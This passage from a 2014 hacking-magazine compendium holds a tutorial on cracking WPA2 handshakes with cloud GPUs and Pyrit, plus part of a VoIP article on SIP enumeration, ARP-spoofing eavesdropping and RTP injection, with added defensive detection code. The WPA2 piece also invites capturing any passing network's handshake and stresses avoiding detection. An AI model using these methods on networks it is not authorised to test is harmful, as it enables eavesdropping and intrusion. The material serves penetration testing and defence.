THE BEST OF
Copyright 2014 Hakin9 Media Sp. z o.o. SK
Table of Contents
Using Amazon AMI for Cracking the WPA2 WiFi Hack, by Bruno Rodrigues (p. 9)
VoIP Hacking Techniques, by Mirko Raimondi (p. 16)
A Crash Course in Pentesting with Backtrack, by Nick Hensley (p. 33)
Using Hydra To Crack The Door Open, by Nikolaos Mitropoulos (p. 53)
NMAP and Metasploit for MS-SQL Auditing, by Jose Ruiz (p. 61)
Nmap: a Hacker Tool for Security Professionals, by Justin Hutchens (p. 76)
How To Reverse Engineer .NET files, by Jaromir Horejsi (p. 88)
Digital Forensics on the Apple OSX Platform, by David Lister (p. 93)
Passwords Cracking: Theory and Practice, by Theodosis Mourouzis (p. 100)
How to Use OpenVAS (Vulnerability Assessment System)?, by Willie Pritchett (p. 107)
How Do I Phish? Advanced Email Phishing Tactics, by Brandon McCann (p. 117)
How to Brute-force Drupal6 Login Pages?, by Kevin Simons (p. 124)
How to Conduct VPN Pivoting?, by Ayman Hammoudeh (p. 135)
Cracking WPA/WPA2 Key Using Reaver, by Badrish Dubey (p. 140)
How to use Socat and Wireshark for Practical SSL Protocol Reverse Engineering?, by Shane R. Spencer (p. 146)
How to Identify and Bypass Anti-reversing Techniques?, by Eoin Ward (p. 153)
Capturing WiFi traffic with Wireshark, by Steve Williams (p. 165)
Wireshark/LUA, by Jörg Kalsbach (p. 175)
Tracing ContikiOS Based IoT communications over Cooja simulations with Wireshark: Using Wireshark with Cooja simulator, by Pedro Moreno-Sanchez and Rogelio Martinez-Perez (p. 181)
Digital Security and Risk Analysis: Side Channel Attack with Brain Leading to Data and ID Theft, by Massimiliano Sembiante (p. 190)
Raspberry Pi Hacking: Loving your pi and hacking it too, by Jeremiah Brott (p. 199)
Bluetooth Hacking Tools, by Dennis Browning (p. 220)
Create a Basic Web Application Scan Policy, by Johan Loos (p. 227)
Create a Basic Scan Policy in Nessus 5, by Johan Loos (p. 233)
Cross-Site Scripting (XSS), by Badrish Dubey (p. 238)
Implementing Rsyslog to forward log messages on an IP network, by Lara Sanz (p. 247)
Weak Wi-Fi Security, Evil Hotspots and Pentesting with Android, by Dan Dieterle (p. 253)
Pentesting with BackTrack distribution, by Jan Hrach, Miroslav Ludvik, Michal Srnec (p. 261)
Use Metasploit in Backtrack 5, by Johan Loos (p. 270)
Using REMnux to analyze PE files, by Glenn P. Edwards Jr (p. 280)
Recovering Passwords and Encrypted Data Remotely in Plain Text, by Daniel Dieterle (p. 285)
Trojan-izing USB Sticks, by Gerasimos Kassaras (p. 291)
Deceiving Networks Defenses with Nmap Camouflaged Scanning, by Roberto Saia (p. 296)
Cross Site Request Forgery: Session Riding, by Miroslav Ludvik and Michal Srnec (p. 308)
Data Logging with Syslog: A Troubleshooting and Auditing Mechanism, by Abdy Martinez (p. 315)
Caffe Latte Attack, by David Jardin (p. 323)
Reverse Engineering C++, a case study with the Win32/Kelihos Malware Family, by Benjamin Vanheuverzwijn, Pierre-Marc Bureau (p. 330)
Cyber Warfare Network Attacks, by Daniel Dieterle (p. 339)
Understanding conditionals in shellcode, by Craig Wright (p. 346)
Creating a Fake Wi-Fi Hotspot to Capture Connected Users Information, by Roberto Saia (p. 355)
Accurate Time Synchronization with NTP: Hardening your Cisco IOS Device, by Abdy Martinez (p. 367)
DNS Cache Poisoning, by Jesus Rivero (p. 373)
Beyond Automated Tools and Frameworks: the ShellCode Injection Process, by Craig Wright (p. 381)
Tabnapping Attack: Hijacking Browser Tabs, by Abdy Martinez (p. 389)
Using the Social Engineering Toolkit to Test Network Security, by Daniel Dieterle (p. 396)
Starting to Write Your Own Linux Shellcode, by Craig Wright (p. 404)
How to Recover Passwords from a Memory Dump, by Daniel Dieterle (p. 411)
Tag: You're Infected! QR Codes as Attack Vectors, by Tim Klup (p. 417)
We are glad to present our first THE BEST OF HAKIN9 in 2014. This time we wanted to sum up the last 3 years of our work and thus we prepared a special collection of 48 top Hakin9 articles. Inside you will find more than 400 pages of how-to and step-by-step tutorials that will surely contribute to your development as a professional pentester, exploiter or ethical hacker.
We hope that this pack will shed some light on the direction our publication took after it underwent major changes such as switching to an electronic version (.pdf and .epub formats) or focusing mostly on exploiting and hacking techniques and tools.
This compendium is also a fine introduction to even greater changes in our magazine, as it shows You, our Reader, the topics that are most burning and eagerly read by Hakin9's audience. We decided to stress the need to meet your high expectations and, in the forthcoming publications, supply You with recurring issues on topics such as Exploiting Software, Reverse Engineering, Pentesting, Offensive Programming and Network Cracking.
We hope You find these changes proper and satisfactory. We strongly encourage all of You to send us many messages about your needs and expectations, as this publication is devoted to You and would not exist without its Readers. Please remember that we are always open to Your ideas and it is You who decide on the following topics of Hakin9.
Feel free to share your views and comment on our recent and future work by sending us a message to en@hakin9.org with COMMENTS in the subject. We respond to all your inquiries.
We wish you a good read,
Krzysztof Samborski
and Hakin9 team
So, a normal word list with Crunch is out of the question. But wait, why don't we pipe Crunch into Pyrit anyway? Would that make a difference?
A few words about the above command: we are telling Crunch to generate all combinations of 8 characters from the character set we provided (it's just easier if I pick all the characters I know, and it will get the job done), and piping the results to Pyrit, which reads them from standard input (-i -) and runs the attack against the .cap file for the Wi-Fi test network (SSID).
As you can see, at around 2000 PMKs per second it would take us years to brute force, so this is not a viable way to crack WPA2 Wi-Fi networks. I found a link on the internet that explains the magnitude of time it would take: http://www.lockdown.co.uk/?pg=combi. I know that you'll probably think this is not how you do it; you probably need to go for CUDA Pyrit. And you're right. For now I just want to show you that a normal desktop/laptop just won't cut it.
There is no efficient way to do it this way. This is the part where I lay down my method. And no, we won't be using CUDA at this stage, since we won't be talking about the 5 Trained Monkeys yet (and they hold hands together). So, what's the method? And why are we using Pyrit?
The reason is simple: Pyrit has an awesome feature that allows you to attack a capture using a pre-loaded database. And why is that relevant? Because it does it by the millions per second, and because we can start building our rainbow tables. In one word, it ESCALATES. Meaning we can potentially break any length of WPA2 password, and I always wanted to get my hands on this solution.
So, let's see how my poor laptop does when I first create the words and then import them into a database. We are still going to stick with Crunch and Pyrit. Pyrit comes with a pre-installed database out of the box that you can use. Still, I leave it to you to connect to external databases that scale much better than the ones on my PC.
Based on what we did previously, we'll do this in 3 steps:
Create the word list based on the same characters used before
Create the batch and attack
The AMI we are using comes empty and, therefore, we need to put in all the tools we require. For a job well done, we'll require Python 2.5, CUDA Pyrit and Crunch. Only then will we be able to put this baby to the test. For now, I'll assume that you, the reader, have the knowledge to do the above or, at least, have a Master's in Google search, where you can find all the information you require to do it.
This article is not about getting Crunch and Pyrit and, therefore, I won't go deep into it. Let's just say that some users out there did us the favour of compiling some interesting scripts that will allow us to get Pyrit (and some other bonus tools) up and running in seconds. That's the power of the AMI: huge bandwidth and computing power.
For performance's sake, I've decided to run the Pyrit benchmark test, and the results are just awesome.
Things are looking good. We should now see how much faster we can crack our test network. First I'll pipe Crunch to Pyrit and then I'll use the built-in database to attack the .cap file.
Technically speaking, let's walk step by step so you can see the wonders of what we are doing. This time, and because I've already mentioned it, I've decided to go with a different AMI so you can see the different options available. Also be careful about the instance type you choose, as many options have different prices and performance. I went with an Amazon GPU-prepared AMI and the g2.2xlarge instance: more expensive but definitely worth it.
Step one
Get the right tools for the job. Again, I won't waste time here since I believe that the hackers who kept reading until now understand the power of Google and will be able to do this in a heartbeat. Remember that this won't be your production machine but, instead, a template we are creating so we don't have to repeat part of the process every time we want to crack a Wi-Fi network. It will also allow us to construct our 5 Monkeys model, where resources are spanned and not physical.
Step two
Create a small fraction of the word list. Now, this is where it got tricky. Nevertheless, after going through the Crunch manual we figured out a way to break the word list into small pieces. Crunch actually splits it at a maximum file size and names each piece, allowing us to resume where it stopped and create from there on. If you notice the -c option you'll see I've chosen a huge value so Pyrit could actually tell me which maximum value I should use.
Figure 9. Crunch
Pay attention to the last sequence in the file name: xxxxx-yyyyy.txt. You'll need to correct the minimum number of characters on the crunch command to match the number of yyyyy.
Step three
Upload all the files to the Pyrit database. Another way to do it would be to generate the word files on your local computer and upload them to the VM. You have the bandwidth, so why use the storage for more than a database? This way you won't take up space with useless files. You'll upload to one VM, place it directly in Pyrit and do a manual distribution to the other VMs. You can schedule it and leave it running during the night, since you'll probably have cheaper storage attached to your computer.
Step four
Save the VM as a template. This step is pretty easy and straightforward. You just go to your EC2 management console, choose the instance you want (in this case all the instances created are pre-loaded with the word lists), give it a name (my advice would be to choose something like nameoffirstfile-nameoflastfile so you know what this VM is supposed to process) and choose create image.
Step five
Launch all the instances, insert the ESSID in Pyrit and run the batch.
Step six
Upload the cap file and attack it with the Pyrit DB. I just want to add an off-topic note in this step (I'm using an Android application on my phone called Linux Deploy that allows us to install the Kali Linux ARM version pretty easily). You can then, when walking down the street, get a perfect cap file for the handshake of any Wi-Fi network that you encounter, scp the file to the Amazon cloud and let the Monkeys do the work for you. After all, they are trained.
You'll notice that all the steps might take some time, like the word creation, VM creation and upload to the Pyrit database, but in fact you are only doing it once, saving it as a template and creating new VMs from the ones previously created. It will take you some time, but you're building a kind of rainbow tables for Wi-Fi, so expect some work prior to attacking and cracking.
As you can see, all the tools and servers mentioned are not new to us, hackers. It's a matter of using some of the available tools and redefining the strategy we will use to attack whatever we can attack, making it more efficient and faster. My challenge here was to see how the mental process can be built, and I hope that the readers might think about other attacks or hacks that, although being new, with a different strategy might get you in where it wasn't possible before.
New tools, new clouds and processing power will keep emerging, and we hackers have to start thinking about how we can leverage a good technology and give it the power it needs to achieve what we want. Also, the strategy defined here will probably go undetected. The capture and the cracking occur at different moments, and the cracking itself won't raise any flags anywhere. Not even on Amazon.
I just hope that if you Security Guys from Amazon are reading this, you understand that we won't be using this for bad things. Keep in mind that we should only use this technique for authorized testing or educational purposes. Always get permission or use your own network before you start cracking.
Bruno Rodrigues is an enthusiastic network engineer with the drive and determination needed to resolve complex networking issues. He possesses effective organizational skills and an excellent working knowledge of networking technologies, and is committed to keeping up to date with the latest developments. He is experienced in providing motivation, guidance and an up-to-date networking consultancy service to both colleagues and clients.
Initially, the PSTN was a simple one-to-one telephone line connecting phones from one room to another. When the telephone business grew, Private Branch eXchanges (PBX) were designed and deployed in office settings to provide a growing number of telephone lines and to connect internal callers (over trunk lines) through the PSTN to destination callers. When the PSTN became digital, a method called Time Division Multiplexing (TDM) was created. TDM transmits and receives independent signals over a common signal path by means of synchronized switches at each end of the transmission line; in this way each signal appears on the line only a fraction of the time, in an alternating pattern.
Voice over Internet Protocol (VoIP) is a newer technology that allows phone conversations to be carried over computer networks; it transforms analog and digital audio signals into data packets. VoIP usually refers to multimedia communication applications that are transported over a packet-switched network (such as the Internet) instead of the PSTN. VoIP has seen rapid adoption over the past few years: many users choose VoIP to leave the traditional telephone providers behind in order to pay cheaper bills, and for companies VoIP is an easy way to communicate between their several branches and with their teleworking employees.
An example of a simple VoIP network can be seen in Figure 1, where VoIP works as a private telephone network and is transparent to the PSTN. Software phones (also called softphones), IP phones and analog phones (which must use a VoIP adapter) can connect to a PBX, where internal telephones are connected to public lines or to other VoIP systems on the Internet. Using a VoIP Media Gateway, a VoIP phone can call a legacy phone on the PSTN and vice versa with no problems, since the Media Gateway translates the IP packets into TDM.
VoIP services are widely used, but their security threats are analyzed only under specific aspects or not taken into consideration at all. This article analyzes the most common VoIP threats in order to identify existing weaknesses and suggests available countermeasures. For each threat an example of attack is reported and explained since, in the author's opinion, knowledge of the tools that could be used by attackers is important. In this way the current VoIP situation will be analyzed from the attacker's point of view to discover the most vulnerable parts of the system. The results of this article could be used by system administrators, network engineers and penetration testers in order to examine their VoIP systems.
The author of this paper disclaims all responsibility for inappropriate use of the information reported here and suggests trying these attack techniques only in controlled environments, like test plants, and with prior authorization from the owner.
Hence receiving endpoints are designed with the assumption that RTP packets will not arrive at the precise rate at which they were transmitted. For this reason an endpoint incorporates a Jitter Buffer, whose parameters manipulate the characteristics of time buffering in an attempt to produce the highest Quality of Service during playback. The Jitter Buffer uses RTP header information to accomplish its functions.
Response Messages contain numeric codes; there are two types of responses and six classes. The response types are:
1. Provisional: its class is 1xx; these responses are used by the server to indicate a progress state, but they cannot terminate SIP transactions;
2. Final: its classes are 2xx, 3xx, 4xx, 5xx and 6xx; these responses terminate the SIP transactions.
The different classes, divided by their prefix number, are:
1xx: provisional, searching, ringing and queuing. Two examples of these messages are 100 Continue and 180 Ringing;
2xx: success. An example is the message 200 OK;
3xx: redirection and forwarding. Examples are the messages 301 Moved Permanently and 302 Moved Temporarily;
4xx: request failure due to client mistakes. The messages 400 Bad Request and 408 Request Time-Out are two examples;
5xx: server failures;
6xx: global failure such as busy, refusal, not available. The messages 600 Busy and 604 Does Not Exist are two examples.
SIP messages are composed of 3 parts:
1. Start Line: each SIP message begins with this part. The Start Line conveys the message type (method type in requests and response code in responses) and the protocol version. The Start Line may be either a Request-line (in a request message; it includes a Request URI, which indicates the user or service to which this request is being addressed, unlike the To field) or a Status-line (in a response message; it holds the numeric Status-code and its associated textual phrase);
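As an added illustration of the two Start Line forms and the response classes described above, the following Python snippet parses a SIP Start Line and classifies responses as provisional or final. This is example code written for this edition, not code from the original article or from any tool it mentions; the sample messages, the extension numbers and the 192.168.101.105 address in them are constructed.

```python
"""
Added example (not from the original article): parse the Start Line of a
SIP message and classify a response by its class.  Sample messages are
constructed for this example.
"""
import re

# Class prefix -> meaning, as listed in the article (RFC 3261 section 7.2).
RESPONSE_CLASSES = {
    1: "provisional",
    2: "success",
    3: "redirection",
    4: "client error",
    5: "server error",
    6: "global failure",
}

REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) (SIP/\d\.\d)$")
STATUS_LINE = re.compile(r"^(SIP/\d\.\d) (\d{3}) (.*)$")


def parse_start_line(message):
    """Describe the first line of a raw SIP message.

    Requests give {'type': 'request', 'method', 'uri', 'version'};
    responses give {'type': 'response', 'version', 'code', 'reason',
    'class', 'final'}.  Anything else raises ValueError.
    """
    first_line = message.split("\r\n", 1)[0].split("\n", 1)[0].strip()
    m = REQUEST_LINE.match(first_line)
    if m:
        method, uri, version = m.groups()
        return {"type": "request", "method": method, "uri": uri, "version": version}
    m = STATUS_LINE.match(first_line)
    if m:
        version, code, reason = m.groups()
        code = int(code)
        cls = code // 100
        if cls not in RESPONSE_CLASSES:
            raise ValueError("unknown SIP response class: %d" % code)
        return {
            "type": "response",
            "version": version,
            "code": code,
            "reason": reason,
            "class": RESPONSE_CLASSES[cls],
            # 1xx responses only report progress and do not terminate the
            # transaction; every other class is final.
            "final": cls != 1,
        }
    raise ValueError("not a SIP start line: %r" % first_line)


def summarize_dialog(messages):
    """Collapse raw SIP messages into short events, e.g. 'INVITE', '180 provisional'."""
    events = []
    for msg in messages:
        info = parse_start_line(msg)
        if info["type"] == "request":
            events.append(info["method"])
        else:
            events.append("%d %s" % (info["code"], info["class"]))
    return events


# Constructed sample: the call flow the article walks through (INVITE,
# provisional responses, OK, then BYE), trimmed to start lines and one header.
SAMPLE_CALL = [
    "INVITE sip:1000@192.168.101.105 SIP/2.0\r\nFrom: <sip:1234@asterisk>\r\n\r\n",
    "SIP/2.0 100 Trying\r\n\r\n",
    "SIP/2.0 180 Ringing\r\n\r\n",
    "SIP/2.0 200 OK\r\n\r\n",
    "BYE sip:1000@192.168.101.105 SIP/2.0\r\n\r\n",
    "SIP/2.0 200 OK\r\n\r\n",
]

if __name__ == "__main__":
    for event in summarize_dialog(SAMPLE_CALL):
        print(event)
```

Run it as a script to print the event sequence of the constructed call; `parse_start_line` can be pointed at the first line of any captured SIP packet, and the `final` flag is what a transaction tracker uses to decide when a transaction is closed.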
which signal, respectively, call progress and the ring-back tone. After about 10 seconds the called user answers, as shown by packet 647, which carries an OK Response Message belonging to class 2xx; now the telephone call is established. The call lasts about 40 seconds, then the caller hangs up, as shown by packet 4985, which carries a BYE Request Message in order to close the call.
Figure 3 reports the details of packet number 421, again captured by means of Wireshark. It is an INVITE Request Message where Start Line, Header Fields and Body are clearly visible.
Information Gathering
In the previous section the features of the network devices were reported by the author in order to help the reader understand the following example, but in reality the network administrator would want to hide that information in order to make any attack harder. So an attacker, with only his own resources, must discover all the information about the network before starting any kind of attack; this is always the first phase of any attack and is called Information Gathering: the attacker gathers information about network devices in order to learn as much as he can. In particular the attacker could be interested in: network hosts, network servers, PBX types and versions, VoIP Media Gateways, SIP client types and versions.
Several free tools could be used by an attacker to accomplish this: SMAP, SIPSAK, SIPSCAN and SVMAP. The author will use SVMAP, which belongs to a suite of SIP tools called SIPVICIOUS (other tools of this suite will be treated in the following sections). Some SVMAP capabilities are reported in the following list:
scan, identify and fingerprint a single target IP, an IP range or even an entire subnetwork;
network interface and local port selection for outgoing packets;
identify SIP devices and PBX servers on default and non-default ports;
scan just one host on different ports, looking for a SIP service on that host, or multiple hosts on multiple ports;
take previous scan results as input, allowing you to only scan known hosts running SIP;
use different scanning methods (OPTIONS, REGISTER, INVITE, etc.);
get all the phones on a network to ring at the same time (using INVITE as method);
randomly scan internet ranges; resume previous scans.
SVMAP allows you to specify the request method that will be used for scanning (by default the OPTIONS method); you can specify a different method to scan with, such as REGISTER or INVITE (attention please! the INVITE method can be noisy and generate a ring at the other end). The list of usable methods is reported in the following:
INVITE: a client is being invited to participate in a call session;
ACK: confirms that the client has received a final response to an INVITE request;
BYE: terminates a call and can be sent by either the caller or the callee;
CANCEL: deletes any pending request;
OPTIONS: queries the capabilities of servers;
REGISTER: registers the address listed in the To header field with a SIP server;
PRACK: provisional acknowledgement;
SUBSCRIBE: subscribes for an Event of Notification from the Notifier;
NOTIFY: notifies the subscriber of a new Event;
PUBLISH: publishes an event to the Server;
INFO: sends mid-session information that does not modify the session state;
REFER: asks the recipient to issue a SIP request (call transfer);
MESSAGE: transports instant messages using SIP;
UPDATE: modifies the state of the session without changing the state of the dialog.
Extensions Enumeration
Extensions Enumeration is an important VoIP attack used in order to identify the live SIP extensions. SVWAR is a free SIP extension line scanner and it will be used by the author in order to accomplish this kind of attack. SVWAR belongs again to the SIPVICIOUS suite and works similarly to traditional wardialers, by guessing a range of extensions or a given list of extensions. Some SVWAR capabilities are reported in the following list:
identify extensions on PBXs and through SIP proxies;
scan for large ranges of numeric extensions;
scan for extensions using a file containing a list of possible extension names;
use different SIP request methods for scanning, since not all PBX servers behave the same;
resume previous scans.
Since ACLs do not prevent ARP spoofing and Caller ID spoofing attacks (they will be treated in the following sections), in order to harden the network further, switches must be configured properly: all unused ports should be disabled and used ports must be configured with the port-security option in order to keep intruder devices out of the network.
Eavesdropping
Eavesdropping is the act of secretly listening to the VoIP conversation of others without their consent; this can be done by means of packet capture, which is the process of intercepting and logging traffic by means of network analyzers.
As already reported in previous sections, a network analyzer is a computer program (such as Wireshark) or a piece of computer hardware that can intercept and log traffic passing over particular types of network, such as Ethernet or wireless. As data streams flow across the network, the sniffer captures each packet and, if needed, decodes it, showing the values of the various fields according to the appropriate RFC or other specifications. Packet capture can be used by attackers over VoIP networks in order to capture SIP requests and RTP data sent from UAC to UAS and back. In this section call eavesdropping is obtained by means of a Man In The Middle (MITM) attack, which means that the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, while the entire conversation is instead controlled by the attacker. In order to obtain the MITM position, the attacker can send fake (spoofed) Address Resolution Protocol (ARP) messages on the Local Area Network (LAN); their aim is to associate the attacker's Media Access Control (MAC) address with the IP address of the PBX, so that any traffic meant for that IP address is sent to the attacker instead. This technique is called ARP spoofing.
Figures 6 and 7 report the ARP spoofing technique executed by the author by means of the ARPSPOOF tool; the first figure reports the spoofing of the UAS (PBX) and the latter the spoofing of UAC#1 (the Linux Mint box). With these two commands the attacker changes its MAC address, spoofing the victim's MAC address, and then sends Gratuitous ARP (GARP) messages announcing the change to UAS and UAC#1. Once the commands are executed, the ARP caches of UAS and UAC#1 are poisoned and all packets exchanged between UAS and UAC#1 pass through the attacker's Linux box; in this way the attacker can record an entire conversation.
Figure 8 reports a call trace between UAC#1 and UAS obtained by means of Wireshark on the attacker's Linux box; as you can see in the picture, a SIP handshake is followed by RTP traffic. Wireshark stores its call traces in .pcap files (since it is developed by means of a library called libpcap) and provides a capability that permits decoding and playing RTP voice packets; Figure 9 reports an example of this feature.
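The defensive counterpart of the ARP spoofing described above is a monitor on the same LAN that watches IP-to-MAC bindings, in the style of arpwatch. The Python below is an added example for this edition, not code from the article or from any tool it mentions: it parses raw Ethernet/ARP frames, keeps the first binding seen for each IP (or a static binding supplied for the PBX) and reports every frame that claims a different MAC for that IP, plus every gratuitous ARP. All frames, MAC addresses and IPs in it are constructed; the 192.168.101.105 PBX address is reused from the article's examples.

```python
"""
Added example (not from the original article): an ARP monitor that flags the
symptoms of ARP spoofing.  Frames, MACs and IPs below are constructed.
"""
import socket
import struct

ETH_HDR = struct.Struct("!6s6sH")           # dst MAC, src MAC, EtherType
ARP_PKT = struct.Struct("!HHBBH6s4s6s4s")   # htype, ptype, hlen, plen, oper, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def build_arp_frame(oper, sender_mac, sender_ip, target_mac, target_ip):
    """Build an Ethernet frame carrying one ARP request/reply (for the sample)."""
    eth = ETH_HDR.pack(mac_bytes(target_mac), mac_bytes(sender_mac), ETHERTYPE_ARP)
    arp = ARP_PKT.pack(1, 0x0800, 6, 4, oper,
                       mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                       mac_bytes(target_mac), socket.inet_aton(target_ip))
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < ETH_HDR.size + ARP_PKT.size:
        return None
    _dst, _src, ethertype = ETH_HDR.unpack_from(frame)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = ARP_PKT.unpack_from(frame, ETH_HDR.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"oper": oper, "sha": mac_str(sha), "spa": socket.inet_ntoa(spa),
            "tha": mac_str(tha), "tpa": socket.inet_ntoa(tpa)}


class ArpMonitor:
    """Tracks IP -> MAC bindings and reports conflicts."""

    def __init__(self, static_bindings=None):
        # Static bindings (e.g. the PBX) are trusted and never overwritten;
        # learned bindings keep the first MAC seen for an IP.
        self.table = {ip: mac.lower() for ip, mac in (static_bindings or {}).items()}

    def observe(self, index, frame):
        """Inspect one frame; return a list of (index, kind, ip, known_mac, seen_mac)."""
        arp = parse_arp(frame)
        if arp is None:
            return []
        alerts = []
        ip, mac = arp["spa"], arp["sha"]
        if arp["spa"] == arp["tpa"]:
            # Gratuitous ARP: a host announcing its own binding.  Legitimate after
            # a reboot or failover, but also exactly what a spoofer sends.
            alerts.append((index, "gratuitous", ip, self.table.get(ip), mac))
        known = self.table.get(ip)
        if known is None:
            self.table[ip] = mac
        elif known != mac:
            alerts.append((index, "binding-change", ip, known, mac))
        return alerts


def scan(frames, static_bindings=None):
    monitor = ArpMonitor(static_bindings)
    alerts = []
    for i, frame in enumerate(frames):
        alerts.extend(monitor.observe(i, frame))
    return alerts


# Constructed sample traffic: the PBX answers normally, then a second host
# claims the PBX's IP towards the phone, first with a directed reply and then
# with a gratuitous ARP.  A non-ARP (IPv4) frame is included to show it is ignored.
PBX_IP, PBX_MAC = "192.168.101.105", "00:11:22:33:44:55"
PHONE_IP, PHONE_MAC = "192.168.101.50", "00:aa:bb:cc:dd:ee"
OTHER_MAC = "66:77:88:99:aa:bb"
SAMPLE_FRAMES = [
    build_arp_frame(ARP_REPLY, PBX_MAC, PBX_IP, PHONE_MAC, PHONE_IP),
    ETH_HDR.pack(mac_bytes(PBX_MAC), mac_bytes(PHONE_MAC), 0x0800) + b"\x45" + b"\x00" * 27,
    build_arp_frame(ARP_REPLY, OTHER_MAC, PBX_IP, PHONE_MAC, PHONE_IP),
    build_arp_frame(ARP_REPLY, OTHER_MAC, PBX_IP, "ff:ff:ff:ff:ff:ff", PBX_IP),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_FRAMES):
        print(alert)
```

In practice the frames would come from a raw socket or a pcap reader on a switch mirror port; supplying the PBX and gateway addresses as static bindings means the monitor alerts on the very first forged reply rather than learning the attacker's MAC.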
Telephone Tampering
Another attack that can be performed by means of MITM is Telephone Tampering; it is a form of sabotage consisting of the intentional modification of the carried signal in a way that makes it harmful to the user. RTP is the media protocol that makes VoIP vulnerable to tampering: RTP is often sent unencrypted and runs over an insecure transport protocol, UDP.
An attacker can capture an RTP packet (by means of the MITM attack) and create RTP packets similar to the original but with a greater timestamp and sequence number. In this way the attacker can trick the victim endpoint into rejecting RTP messages from the legitimate endpoint in favour of the injected packets, since the original packets appear old. As the packets carry a valid and unchanged SSRC (synchronization source identifier, which characterizes the current session), they are accepted as part of the original transmission. Telephone Tampering can have very serious consequences, because caller and called party consider themselves trusted parties.
Figure 10 shows an example of the Telephone Tampering attack obtained by means of the RTPINSERTSOUND tool; this can be used to inject a .wav file (selected by the attacker) into the RTP stream, replacing the voice signal from one side with the signal within the .wav audio file.
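The injection described above leaves a measurable trace in the RTP headers: a packet whose sequence number and timestamp both leap far ahead of the stream, followed by the legitimate packets arriving "stale" behind it. The Python below is an added example for this edition, not code from the article or from RTPINSERTSOUND: it parses the fixed 12-byte RTP header, tracks the last sequence number and timestamp accepted per SSRC (mirroring the victim endpoint) and flags both symptoms. The stream is constructed (G.711 at 8000 Hz, 20 ms per packet, so 160 samples per packet; the SSRC value is arbitrary), and the thresholds are assumptions to tune per deployment.

```python
"""
Added example (not from the original article): a detector for the RTP
injection pattern of Telephone Tampering.  Stream below is constructed.
"""
import struct

RTP_HDR = struct.Struct("!BBHII")   # V/P/X/CC, M/PT, sequence, timestamp, SSRC


def build_rtp(seq, timestamp, ssrc, payload_type=0, marker=False, payload=b"\xff" * 160):
    """Assemble an RTP v2 packet with no CSRCs or extensions (for the sample)."""
    first = 0x80                                   # version 2, P=0, X=0, CC=0
    second = (0x80 if marker else 0) | (payload_type & 0x7F)
    return RTP_HDR.pack(first, second, seq & 0xFFFF, timestamp & 0xFFFFFFFF, ssrc) + payload


def parse_rtp(packet):
    if len(packet) < RTP_HDR.size:
        raise ValueError("packet too short for an RTP header")
    first, second, seq, timestamp, ssrc = RTP_HDR.unpack_from(packet)
    if first >> 6 != 2:
        raise ValueError("not RTP version 2")
    return {"seq": seq, "timestamp": timestamp, "ssrc": ssrc,
            "payload_type": second & 0x7F, "marker": bool(second & 0x80)}


def _wrap16(delta):
    """Signed distance between two 16-bit sequence numbers."""
    delta &= 0xFFFF
    return delta - 0x10000 if delta >= 0x8000 else delta


def _wrap32(delta):
    """Signed distance between two 32-bit timestamps."""
    delta &= 0xFFFFFFFF
    return delta - 0x100000000 if delta >= 0x80000000 else delta


class RtpInjectionDetector:
    def __init__(self, samples_per_packet=160, max_seq_jump=50, max_reorder=5):
        self.samples_per_packet = samples_per_packet
        self.max_seq_jump = max_seq_jump   # forward gaps larger than ordinary loss (assumed threshold)
        self.max_reorder = max_reorder     # small negative gaps are normal jitter (assumed threshold)
        self.last = {}                     # ssrc -> (seq, timestamp) last accepted

    def feed(self, index, packet):
        """Return (index, kind, seq) for a suspicious packet, else None."""
        h = parse_rtp(packet)
        prev = self.last.get(h["ssrc"])
        if prev is None:
            self.last[h["ssrc"]] = (h["seq"], h["timestamp"])
            return None
        seq_delta = _wrap16(h["seq"] - prev[0])
        ts_delta = _wrap32(h["timestamp"] - prev[1])
        if seq_delta < -self.max_reorder:
            # Older than what the endpoint already played: after an injection
            # this is where the legitimate stream starts being discarded.
            return (index, "stale", h["seq"])
        verdict = None
        if seq_delta > self.max_seq_jump and ts_delta > self.max_seq_jump * self.samples_per_packet:
            verdict = (index, "injected", h["seq"])
        # Mirror the endpoint: the newest packet becomes the reference.
        self.last[h["ssrc"]] = (h["seq"], h["timestamp"])
        return verdict

    def scan(self, packets):
        alerts = []
        for i, p in enumerate(packets):
            a = self.feed(i, p)
            if a is not None:
                alerts.append(a)
        return alerts


def constructed_stream(ssrc=0x1234ABCD):
    """Five legitimate packets, one injected far ahead, then three more
    legitimate packets that now look old to the receiver."""
    base_ts = 16000
    pkts = [build_rtp(100 + i, base_ts + 160 * i, ssrc) for i in range(5)]
    pkts.append(build_rtp(100 + 5 + 999, base_ts + 160 * (5 + 999), ssrc))
    pkts += [build_rtp(105 + i, base_ts + 160 * (5 + i), ssrc) for i in range(3)]
    return pkts


if __name__ == "__main__":
    for alert in RtpInjectionDetector().scan(constructed_stream()):
        print(alert)
```

A burst of "stale" verdicts right after a single "injected" one is the signature to alert on; ordinary packet loss produces a forward gap without the stale tail, and ordinary jitter produces only small reorders, which the `max_reorder` allowance absorbs.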
Authentication Attacks
In the past SIP used weak authentication where the password was sent in plain text, making it easy to obtain for anyone who could get access to SIP messages. Since this authentication was insecure it was deprecated and now, in SIP 2.0, the MD5 message-digest algorithm is used for hashing the UAC password. When a UAC wants to authenticate with a UAS, the UAS generates and sends a digest challenge to the UAC. The simplest authentication challenge that a UAS can send contains a Realm (used to identify credentials within a SIP message; usually it is the SIP domain) and a Nonce (this is an MD5 unique string generated by the UAC for each registration request; it is made from a time stamp and a secret phrase to ensure a limited lifetime, and it cannot be used again), as reported in the following:
WWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="3cf75870"
Once the UAC receives the digest challenge and the user enters his credentials, the client uses the nonce to generate a digest response and sends it back to the server:
Authorization: Digest username="1234", realm="asterisk", nonce="3cf75870", uri="sip:1000@192.168.101.105", response="cf89107228a444c1e8b761dfb6e669e4", algorithm=MD5
The UAS will then perform the same computation to arrive at its own MD5 hash and, if it matches the one supplied by the UAC, the UAS responds with a 200 OK message and the UAC is authenticated.
